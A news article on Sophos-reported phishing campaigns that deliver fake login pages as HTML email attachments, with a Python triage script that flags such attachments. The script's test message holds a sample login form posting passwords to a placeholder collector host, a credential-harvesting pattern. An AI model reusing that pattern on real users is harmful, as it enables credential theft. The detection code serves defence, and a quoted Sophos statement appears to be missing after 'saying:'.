The cybersecurity firm Sophos has observed two new phishing campaigns in the wild that use a new trick to help them avoid detection.
Email phishing scams typically employ a three-stage process to get potential targets to give up their credentials. It begins with an email that contains a URL the attackers want users to click. Clicking that link brings potential victims to a fake login page where their credentials are harvested and then sent to another site, where the cybercriminals behind the campaign use them to take over user accounts.
However, these two new phishing campaigns, one of which Sophos received directly and one of which was reported by a reader, use this same three-stage process with a slight twist.
The cloned website in step two wasn’t reached by clicking a link in an email. Instead, the fake website was attached to the email itself as an HTML attachment.
HTML attachments versus links
By attaching their phishing pages to emails instead of linking to them, the cybercriminals behind these new campaigns are increasing the likelihood that a victim will open their fake web pages. This is because opening an attachment doesn’t feel nearly as dangerous when it isn’t a document that could contain macros, a PowerShell file or an executable program.
In theory, opening an HTML attachment simply opens the enclosed web page in the safety of the browser’s sandbox, just as if the victim had clicked a link. However, with an HTML attachment, users cannot inspect the link in advance to look for a fake or suspicious domain name, and the URL in the address bar looks like a local filename.
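Because the harvested credentials still have to leave the victim's machine, the attached page must contain a form (or script) that posts them to a remote host, and that is something a mail gateway or incident responder can check for before the attachment is ever opened. The script below is an added example written for this article, not code from Sophos or from either campaign: it parses an .eml with Python's standard library, pulls out every .htm/.html attachment, and flags any that carries a password field or a form whose action points at an external http(s) host. The message it scans is constructed inline, and the collector hostname in it is a placeholder.

```python
"""Flag HTML/HTM email attachments that carry a credential-harvesting form.

Added example for a mail-gateway or IR triage step. The .eml it scans is
constructed below; the collector host in it is an .invalid placeholder.
"""
import email
import email.policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Collect <form action> targets and note whether a password input exists."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.has_password_field = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_field = True


def html_attachments(raw_eml: bytes):
    """Yield (filename, html_text) for every .htm/.html attachment in the message."""
    msg = email.message_from_bytes(raw_eml, policy=email.policy.default)
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if part.get_content_type() == "text/html" or name.endswith((".htm", ".html")):
            payload = part.get_payload(decode=True) or b""
            charset = part.get_content_charset() or "utf-8"
            yield name, payload.decode(charset, "replace")


def scan_eml(raw_eml: bytes):
    """Return one finding dict per suspicious HTML attachment (empty list if none)."""
    findings = []
    for name, html_text in html_attachments(raw_eml):
        scanner = _FormScanner()
        scanner.feed(html_text)
        # A form whose action is an absolute http(s) URL sends whatever is typed
        # into the locally opened file straight to a remote host on submit.
        remote_targets = [
            u for u in scanner.form_actions
            if urlparse(u).scheme in ("http", "https") and urlparse(u).netloc
        ]
        if remote_targets or scanner.has_password_field:
            findings.append({
                "attachment": name,
                "remote_form_targets": remote_targets,
                "password_field": scanner.has_password_field,
            })
    return findings


def build_sample_eml() -> bytes:
    """Constructed test message: plain body plus an HTML attachment whose login
    form posts to a placeholder external host (hypothetical, .invalid TLD)."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Invoice attached"
    msg.set_content("Please see the attached file.")
    page = (
        "<html><body>\n"
        "<form method='post' action='https://collector.example.invalid/login'>\n"
        "<input name='user'><input type='password' name='pass'>\n"
        "<input type='submit'></form>\n"
        "</body></html>\n"
    )
    msg.add_attachment(page, subtype="html", filename="invoice.html")
    return bytes(msg)


if __name__ == "__main__":
    for finding in scan_eml(build_sample_eml()):
        print(finding)
```

Run it against a real .eml by passing the file's bytes to `scan_eml`. The check is deliberately narrow: a page that exfiltrates via JavaScript rather than a plain form action, or that loads its form from a remote URL, would slip past it, so treat a hit as a reason to quarantine and a miss as no verdict at all.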
Sophos warned about the dangers of opening HTML attachments in a new blog post, saying:
To avoid falling victim to these new phishing campaigns, Sophos recommends that users avoid HTM or HTML attachments altogether, never log in to web pages they arrived at from an email, turn on 2FA when possible, change passwords as soon as they believe they’ve been phished, and use a web filter.